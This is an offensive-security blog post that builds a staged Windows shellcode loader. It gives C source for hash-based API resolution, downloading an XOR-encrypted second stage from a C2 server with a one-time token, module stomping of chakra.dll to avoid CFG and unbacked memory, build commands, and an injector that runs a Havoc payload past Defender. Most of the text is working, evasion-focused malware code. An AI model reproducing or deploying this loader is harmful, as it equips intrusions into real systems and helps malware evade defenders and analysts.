Stage, But Verify

Introduction

Before delving into the technical implementations of this project, let's understand the difference between staged and stageless payloads. A stageless payload contains all the required dependencies within itself and is a standalone exploit. In the context of a C2 communication, once a stageless payload is executed, it connects back to the C2 server for instructions. Staged payloads, on the other hand, when executed, retrieve the main payload over the network and execute it.

There are many advantages to using staged payloads. They are often lightweight and practical where the dropper's size is crucial. Additionally, if your stager gets blocked, your actual payload (second-stage payload) is not compromised. However, Blue Teams can analyse the initial payloads to determine the endpoint where the second stage is hosted and attempt to access it. There are various steps that one can take while building their C2 infrastructure to block unauthorised connection attempts. These typically include comparing the request's User-Agent string against a whitelist, using cookie values, or whitelisting IP ranges from which requests are allowed. However, an unauthorised request can follow these rules and obtain the main payload, which can be further analysed to gain information regarding the implant. This project aims to build a POC of a stager shellcode that sends an authentication token with the request, which is validated by the server before sending the second stage. The number of times a payload can authenticate can be configured, and once the token expires, the requests are blocked even if they are generated from the stager.

To execute our main payload in the process, we need to allocate additional space that has execute permissions. If we allocate ReadExecute or ReadWriteExecute (RX/ RWX) memory region, it creates unbacked memory regions with suspicious permissions, which are heavily monitored by defensive solutions. An unbacked memory region means that there is no corresponding file on the disk, and it exists only in memory. Hence, we will execute our final payload using Module Stomping, also known as DLL Hollowing. This technique loads a genuine DLL that a process doesn't require and rewrites the DLL's code with our payload.

There are two aspects to this project. The first component is the generation of the stager shellcode, and the second is a server component that validates the requests before sending the second stage.

The code for this blog is available at:

Building Stager Shellcode

Shellcode, also known as machine code, are instructions that can be directly executed by the processor. A shellcode program can be manually written using assembly language, but that's a very tedious task and not viable for large projects. Instead, we will write our program in a high-level language such as C, compile it into an executable, and extract the machine code. These machine code instructions are stored in the .text section of an executable. Since we will only extract the instructions, our compiled executable shouldn't depend on other sections, like .data, .rdata, or .bss, which means that the program cannot use global variables or string literals.

In Windows, the Operating System's functionality is exposed through Windows DLLs as Win32APIs. For example, to display a message box, MessageBoxA API is used from the User32.dll. All the APIs and DLLs an executable uses are stored in the "Import Address Table" (IAT). During runtime, Windows Loader loads these DLLs, and the addresses of required APIs are mapped in the IAT. When the program calls this API, the address is looked up from the IAT. Shellcode, on the other hand, cannot have any dependencies and should manually load the required DLLs and iterate over functions in the DLL to identify the addresses of the required APIs.

The following functions are used to enumerate modules loaded by a process and to get the address of APIs exported by the modules. In essence, they are just custom implementations of the GetModuleHandle and GetProcAddress WinAPIs.

UINT64 GetModule(DWORD dwHash) {

	PPEB pPeb;
	PPEB_LDR_DATA pLdr;
	PLDR_DATA_TABLE_ENTRY pLdte, pHead;

	pPeb = (PPEB)__readgsqword(0x60);
	pLdr = pPeb->Ldr;
	pLdte = (PLDR_DATA_TABLE_ENTRY)pLdr->InMemoryOrderModuleList.Flink;
	pHead = pLdte;

	do {
		if (HashDjb2W(pLdte->BaseDllName.Buffer) == dwHash) {
			return (UINT64)pLdte->DllBase;
		}

		pLdte = (PLDR_DATA_TABLE_ENTRY)((PLIST_ENTRY)pLdte)->Flink;
	}while (pLdte != pHead);

	return 0;
}

UINT64 GetProcAddrHash(UINT64 hModule, DWORD dwHash) {

	if (!hModule) {
		return 0;
	}
	PIMAGE_EXPORT_DIRECTORY pImgExp;

	pImgExp = (PIMAGE_EXPORT_DIRECTORY)(hModule + ((PIMAGE_NT_HEADERS)(hModule + ((PIMAGE_DOS_HEADER)hModule)->e_lfanew))->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	PDWORD  pAddressOfFunctions = (PDWORD)(hModule + pImgExp->AddressOfFunctions);
	PDWORD  pAddressofNames = (PDWORD)(hModule + pImgExp->AddressOfNames);
	PWORD   pAddressofOrdinals = (PWORD)(hModule + pImgExp->AddressOfNameOrdinals);

	for (int i = 0; i < pImgExp->NumberOfFunctions; i++) {
		if (HashDjb2A((CHAR*)(hModule + pAddressofNames[i])) == dwHash) {
			WORD	wOrdinal = pAddressofOrdinals[i];
			return (UINT64)(hModule + pAddressOfFunctions[wOrdinal]);
		}
	}

	return 0;
}

Utilising these functions, we can get the location of the KERNEL32.DLL module in memory and the address of the LoadLibraryA function. The LoadLibraryA can be used to load additional DLLs in the process. As our program will download the second stage over HTTP protocol, we need to load the WinInet.DLL and resolve the addresses of InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, HttpQueryInfoA, InternetQueryDataAvailable, InternetReadFile, and InternetCloseHandle Win32APIs. To map the contents of our sacrificial module in memory, we will be using the NtCreateSection and NtMapViewOfSection NTAPIs. For the allocation and deallocation of dynamic memory in the heap, we will be using the calloc and free functions from the msvcrt.DLL. From the KERNEL32.DLL, we will be using the CreateFileW, VirtualProtect, CreateThread, and WaitForSingleObject WinAPIs. Both GetModule and GetProcAddrHash utilise hashes of strings for comparison. The djb2 hash is calculated for these functions using the following code.

#include <stdio.h>

unsigned int HashDjb2A (char* pString) {

    unsigned int Hash = 0;
    unsigned int c;

    while(c = *pString++) {
        Hash = ((Hash << 4) + Hash) + c;
    }
    return Hash;
}

unsigned int HashDjb2W (wchar* pString) {

    unsigned int Hash = 0;
    unsigned int c;

    while(c = *pString++) {
        Hash = ((Hash << 4) + Hash) + c;
    }
    return Hash;
}

int main(int argc, char** argv) {

  if (argc != 2)
    return -1;
  printf("#define %s_HASH 0x%.4x\n", argv[1], HashDjb2A(argv[1]));
}

Downloading The Stage

In this part of our program, the second stage payload will be downloaded by sending a get request to our web server. The authentication token will be sent in the WWW-Authenticate request header, which is typically used while performing Basic Authentication. The server validates the URI and the auth token and sends the second-stage payload. The functions required for these operations will be resolved dynamically using the GetModule and GetProcAddrHash functions.

The token used for authentication is dynamically generated by the Python server during runtime and will be unique for each execution. While downloading our payload, the first four bytes contain the total size of our shellcode, which is used to allocate memory in the heap, and the payload is written at this location.

VOID DownloadExec() {


	HINTERNET		hInternet = NULL,
					hConnect  = NULL,
					hRequest  = NULL;



	DWORD			dwStatusCode = 0;
	DWORD			dwLength = sizeof(DWORD);
	DWORD			dwBytesAvailable;
	BYTE			*pMessageBody = NULL, *pShellCode = NULL;
	DWORD			dwSizeOfPayload = 0;
	DWORD			dwFseek = 0;
	BOOL			bSuccess = TRUE;

	CHAR			useragent[] = {'M', 'o', 'z', 'i', 'l', 'l', 'a', '/', '5', '.', '0', ' ', '(', 'W', 'i', 'n', 'd', 'o', 'w', 's', ' ', 'N', 'T', ' ', '6', '.', '1', ';', ' ', 'W', 'O', 'W', '6', '4', ')', ' ', 'A', 'p', 'p', 'l', 'e', 'W', 'e', 'b', 'K', 'i', 't', '/', '5', '3', '7', '.', '3', '6', ' ', '(', 'K', 'H', 'T', 'M', 'L', ',', ' ', 'l', 'i', 'k', 'e', ' ', 'G', 'e', 'c', 'k', 'o', ')', ' ', 'C', 'h', 'r', 'o', 'm', 'e', '/', '9', '6', '.', '0', '.', '4', '6', '6', '4', '.', '1', '1', '0', ' ', 'S', 'a', 'f', 'a', 'r', 'i', '/', '5', '3', '7', '.', '3', '6', 0};
	CHAR			domain[] = {'1', '9', '2', '.', '1', '6', '8', '.', '0', '.', '1', '0', '2', 0};
	INTERNET_PORT	nServerPort = 8080;
	CHAR			requestType[] = {'G', 'E', 'T', 0};
	CHAR			resource[] = {'i', 'n', 'd', 'e', 'x', '.', 'p', 'h', 'p', 0};
	CHAR 			header[35] = {'W', 'W', 'W', '-', 'A', 'u', 't', 'h', 'e', 'n', 't', 'i', 'c', 'a', 't', 'e', ':', ' '};
					header[34] = 0x00;
	UINT64 			token = 0xa15257eba85d9255;
	

	
	WCHAR	wsSacrificialDLL[] = {L'C', L':', L'\\', L'W', L'i', L'n', L'd', L'o', L'w', L's', L'\\', L'S', L'y', L's', L't', L'e', L'm', L'3', L'2', L'\\', L'C', L'h', L'a', L'k', L'r', L'a', L'.', L'd', L'l', L'l', 0};

	UINT64  wininetdll, msvcrtdll, ntdll, kernel32dll;
	UINT64	InternetOpenAFunc, InternetConnectAFunc, HttpOpenRequestAFunc, HttpSendRequestAFunc, HttpQueryInfoAFunc, InternetQueryDataAvailableFunc,
			InternetReadFileFunc, InternetCloseHandleFunc, callocFunc, freeFunc, LoadLibraryAFunc;

	NTAPIFP ntApi = { 0x00 };

	//Kernel32.DLL
	kernel32dll = (UINT64)GetModule(KERNEL32_HASH);
	LoadLibraryAFunc = GetProcAddrHash(kernel32dll, LOADLIBRARYA_HASH);


	//WinInet.DLL Functions
	CHAR wininetdll_c[] = {'w', 'i', 'n', 'i', 'n', 'e', 't', 0};
	wininetdll = (UINT64)((fnLoadLibraryA)LoadLibraryAFunc)(wininetdll_c);
	InternetOpenAFunc = (UINT64)GetProcAddrHash(wininetdll, InternetOpenA_HASH);
	InternetConnectAFunc = (UINT64)GetProcAddrHash(wininetdll, InternetConnectA_HASH);
	HttpOpenRequestAFunc = (UINT64)GetProcAddrHash(wininetdll, HttpOpenRequestA_HASH);
	HttpSendRequestAFunc = (UINT64)GetProcAddrHash(wininetdll, HttpSendRequestA_HASH);
	HttpQueryInfoAFunc = (UINT64)GetProcAddrHash(wininetdll, HttpQueryInfoA_HASH);
	InternetQueryDataAvailableFunc = (UINT64)GetProcAddrHash(wininetdll, InternetQueryDataAvailable_HASH);
	InternetReadFileFunc = (UINT64)GetProcAddrHash(wininetdll, InternetReadFile_HASH);
	InternetCloseHandleFunc = (UINT64)GetProcAddrHash(wininetdll, InternetCloseHandle_HASH);

	//MSVCRT.DLL Functions
	CHAR msvcrtdll_c[] = {'m', 's', 'v', 'c', 'r', 't', 0};
	msvcrtdll = (UINT64)((fnLoadLibraryA)LoadLibraryAFunc)(msvcrtdll_c);
	callocFunc = (UINT64)GetProcAddrHash(msvcrtdll, calloc_HASH);
	freeFunc = (UINT64)GetProcAddrHash(msvcrtdll, free_HASH);
	

	//NTDLL.DLL
	ntdll = (UINT64)GetModule(NTDLL_HASH);
	ntApi.pNtCreateSection = (fnNtCreateSection)GetProcAddrHash(ntdll, NtCreateSection_HASH);
	ntApi.pNtMapViewOfSection = (fnNtMapViewOfSection)GetProcAddrHash(ntdll, NtMapViewOfSection_HASH);
	ntApi.pCreateFileW = (fnCreateFileW)GetProcAddrHash(kernel32dll, CreateFileW_HASH);


	// Initialize Usage of WinInet Functions

	if ((hInternet = ((fnInternetOpenA)InternetOpenAFunc)(useragent, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0))) {

		// Open a HTTP connection to our staging server
		if ((hConnect = ((fnInternetConnectA)InternetConnectAFunc)(hInternet, domain, nServerPort, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0))) {

		
			if ((hRequest = ((fnHttpOpenRequestA)HttpOpenRequestAFunc)(hConnect, requestType, resource, NULL, NULL, NULL, 0, 0))) {

					// Add our Authentication Token to Request Headers
					headercat(header, token);

					// Send the GET Request
					if ((((fnHttpSendRequestA)HttpSendRequestAFunc)(hRequest, header, 35, NULL, 0))) {

						// Obtain the Response Status Code
						if (((fnHttpQueryInfoA)HttpQueryInfoAFunc)(hRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwStatusCode, &dwLength, NULL)) {

							if (dwStatusCode == HTTP_STATUS_OK) {
								
								
								while (((fnInternetQueryDataAvailable)InternetQueryDataAvailableFunc)(hRequest, &dwBytesAvailable, 0, 0)) {


									DWORD dwBytesRead;


									if (!dwSizeOfPayload) {
										// First loop Iteration
										// Read the irst 4-Bytes, which contains size of the shellcode
										if (((fnInternetReadFile)InternetReadFileFunc)(hRequest, &dwSizeOfPayload, sizeof(DWORD), &dwBytesRead)) {

											pMessageBody = (BYTE*)((fncalloc)callocFunc)(1, dwSizeOfPayload);
											if (pMessageBody == NULL)
												return;
											pShellCode = pMessageBody;

										}

										if (((fnInternetReadFile)InternetReadFileFunc)(hRequest, pMessageBody, dwBytesAvailable - 4, &dwBytesRead)) {

											if (dwBytesRead == 0) {
												bSuccess = FALSE;
												break;
											}

											pMessageBody = (BYTE*)((ULONG_PTR)pMessageBody + dwBytesRead);

										}

									}
									else {

										if (((fnInternetReadFile)InternetReadFileFunc)(hRequest, pMessageBody, dwBytesAvailable, &dwBytesRead)) {

											if (dwBytesRead == 0)
												break;

											pMessageBody = (BYTE*)((ULONG_PTR)pMessageBody + dwBytesRead);

										}

									}

								}
								
							}
						}
					}

			}


		}

		if (bSuccess)
			ExecuteShellcode(pShellCode, dwSizeOfPayload, kernel32dll, wsSacrificialDLL, &ntApi);

		((fnfree)freeFunc)(pShellCode);
		((fnInternetCloseHandle)InternetCloseHandleFunc)(hRequest);
		((fnInternetCloseHandle)InternetCloseHandleFunc)(hConnect);
		((fnInternetCloseHandle)InternetCloseHandleFunc)(hInternet);
	}

}

Module Stomping

After downloading our second-stage payload, we will load a sacrificial DLL and replace the original code with our shellcode. By stomping a DLL, we will not be creating any unbacked or additional RX/RWX regions and will be utilising the RX region of the .text section of our DLL. The DLL is mapped in memory using the CreateFileW, NtCreateSection, and NtMapViewOfSection APIs.

Windows utilises Control Flow Guard (CFG) as a security mechanism for exploit prevention. If CFG is enabled, all the calls to functions will be monitored to determine if they are valid functions. Otherwise, the program gets terminated. By manually mapping our DLL into memory, the .text section will not be subjected to CFG checks. If we alternatively use LoadLibrary to load the DLL, the Windows loader will register CFG checks for the DLL's code, which needs to be bypassed to execute our payload. We will be going with the former approach as that's simpler. After mapping the DLL into memory, we will identify the address of our DLL's entry point, which is where our second-stage payload will be written.

BOOL LoadDllFile(IN LPCWSTR szDllFilePath, OUT HMODULE* phModule, OUT PULONG_PTR puEntryPoint, PNTAPIFP pNtApi) {

	HANDLE				hFile = INVALID_HANDLE_VALUE,
						hSection = NULL;
	NTSTATUS			STATUS = STATUS_SUCCESS;
	ULONG_PTR			uMappedModule = NULL;
	SIZE_T				sViewSize = NULL;
	PIMAGE_NT_HEADERS	pImageNtHeaders = NULL;
	PIMAGE_DOS_HEADER	pImageDosHeader = NULL;
	HANDLE				hFileMap = INVALID_HANDLE_VALUE;



	if ((hFile = ((fnCreateFileW)pNtApi->pCreateFileW)(szDllFilePath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)) != INVALID_HANDLE_VALUE) {


		if (NT_SUCCESS((STATUS = pNtApi->pNtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, 0X00, PAGE_READONLY, SEC_IMAGE, hFile)))) {

			if (NT_SUCCESS((STATUS = pNtApi->pNtMapViewOfSection(hSection, (HANDLE)-1, &uMappedModule, NULL, NULL, NULL, &sViewSize, ViewShare, NULL, PAGE_EXECUTE_READWRITE)))) {
				*phModule = uMappedModule;
				pImageDosHeader = (PIMAGE_DOS_HEADER)uMappedModule;
				pImageNtHeaders = (PIMAGE_NT_HEADERS)(uMappedModule + pImageDosHeader->e_lfanew);
				*puEntryPoint = uMappedModule + pImageNtHeaders->OptionalHeader.AddressOfEntryPoint;

				return TRUE;
			}

		}

	}

	return FALSE;

}

Shellcode Execution

The .text section of our sacrificial DLL has Read and Execute permissions. After obtaining the Entry Point of the DLL, the memory permissions need to be modified to allow write access, and our payload will be written at this location. To evade signature-based network detections, the payload is XOR encrypted during transfer. The decryption routine will be called after writing our shellcode in the final location. The original RX memory permissions are then applied to this region, and the shellcode is executed by creating a new thread.

VOID ExecuteShellcode(unsigned char* shellcode, SIZE_T szSize, UINT64 kernel32dll, LPWSTR wsSacrificialDll, PNTAPIFP pNtApi) {

	LPVOID		pAddress = NULL;
	HANDLE		hThread = INVALID_HANDLE_VALUE;
	HMODULE		hModule = NULL;
	ULONG_PTR	uEntryPoint = NULL;
	DWORD		dwOldProtection = 0;
	unsigned char	cKey = 0x94;

	UINT64 VirtualProtectFunc, CreateThreadFunc, WaitForSingleObjectFunc;

	VirtualProtectFunc = (UINT64)GetProcAddrHash(kernel32dll, VIRTUALPROTECT_HASH);
	CreateThreadFunc = (UINT64)GetProcAddrHash(kernel32dll, CREATETHREAD_HASH);
	WaitForSingleObjectFunc = (UINT64)GetProcAddrHash(kernel32dll, WAITFORSINGLEOBJECT_HASH);


	if (LoadDllFile(wsSacrificialDll, &hModule, &uEntryPoint, pNtApi)) {

		if (((fnVirtualProtect)VirtualProtectFunc)(uEntryPoint, szSize, PAGE_READWRITE, &dwOldProtection)) {
			my_memcpy(uEntryPoint, shellcode, szSize);
			XorDecrypt(uEntryPoint, cKey, szSize);
			if (((fnVirtualProtect)VirtualProtectFunc)(uEntryPoint, szSize, PAGE_EXECUTE_READ, &dwOldProtection)) {
				hThread = ((fnCreateThread)CreateThreadFunc)(NULL, 0X00, uEntryPoint, NULL, 0x00, NULL);
				((fnWaitForSingleObject)WaitForSingleObjectFunc)(hThread, INFINITE);
			}
		}

	}
}

Final Steps

Now that our stager's functionality has been implemented, it needs to be compiled to extract our final shellcode. When dealing with NTAPIs, Windows expects that the stack is 16-bit aligned. Since we don't know the state of the stack when our shellcode is executed, it becomes our responsibility to align the stack before executing our DownloadExec function. Hence, we will be using a small assembly code that will align the stack before calling our function. This assembly code has been borrowed from Chetan Nayak's Blog (linked in the references section).

extern DownloadExec
global alignstack

segment .text

alignstack:
    push rdi
    mov rdi, rsp
    and rsp, byte -0X10
    sub rsp, byte +0x20
    call DownloadExec
    mov rsp, rdi
    pop rdi
    ret

We will use a linker script to define our entrypoint and link our object files

ENTRY(alignstack)
SECTIONS
{
	.text :
	{
        *(.text.alignstack)
		*(.text.DownloadExec)
	}
}

Compiling the executable

nasm -f win64 alignstack.asm -o alignstack.o
x86_64-w64-mingw32-gcc stager.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o stager.o -Wl,-Tlinker.ld,--no-seh
x86_64-w64-mingw32-ld -s alignstack.o stager.o -o ./stager.exe

Using the following Python script, we can extract the .text section from the executable file

import pe

pe = pefile.PE('stager.exe')
for section in pe.sections:
if section.Name == b'.text\x00\x00\x00':
	bindata = section.get_data()
	break

with open('stager.bin', 'wb') as binwrite:
	binwrite.write(bindata)

Building the Backend

Now that the first part is done, we need to implement a backend that automates the process of generating the stager shellcode and starting a web server. A Python script is written to take care of this.

Usage

The script takes in the following arguments

-f: Path to your shellcode
-H: IP address or Domain where the stager needs to connect back
-s: Port number. By default, it uses 80.
-d: DLL to use for hollowing. By default C:\Windows\System32\chakra.dll is used.
-t: Validity of Authentication tokens. If this parameter is configured as 2, the token expires after detonating the payload twice.
-x: Output Format of the shellcode.

Demo

We will use a simple shellcode injector to test our stager against Defender. The stager will download and execute Havoc's payload.

#include <windows.h>

unsigned char shellcode[] = {0x57,...,0x57}; // Replace with stager shellcode

int main() {

    PVOID pAddress = NULL;

    pAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (pAddress) {
        memcpy(pAddress, shellcode, sizeof(shellcode));
        WaitForSingleObject(CreateThread(NULL, 0X00, pAddress, NULL, 0X00, NULL), INFINITE);
    }

}

References

https://maldevacademy.com/new/modules/36
https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/
https://blog.differentpla.net/blog/2004/02/26/downloading-from-an-http-server-using-wininet/

Previousx64 Return Address Spoofing

Last updated 7 months ago